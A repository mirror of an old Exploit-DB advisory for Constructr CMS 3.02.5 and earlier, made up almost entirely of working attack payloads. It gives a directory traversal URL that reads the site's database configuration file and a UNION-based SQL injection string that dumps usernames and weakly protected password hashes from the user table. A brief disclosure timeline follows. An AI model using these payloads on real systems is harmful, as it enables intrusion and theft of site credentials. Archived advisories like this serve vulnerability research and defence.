bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7529.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

32 lines
No EOL
766 B
Text
Raw Blame History

Constructr CMS
http://constructr-cms.org/
- <= 3.02.5 "Stable" -
magic_quotes_gpc = Off
register_globals = On
- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc -
http://site/constructr/backend/template.php?edit_file=
Db info:
../config/config.inc.php
- SQL -
http://site/constructr/?show_page=
User (urlencode) :
-0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML
"Hash" is the password, not really encrypted...
- Timeline -
Author notified: Dec 12
Public Disclosure: Dec 19
- Seasons Greetings -
- http://nukeit.org -
# milw0rm.com [2008-12-19]
Reference in a new issue View git blame Copy permalink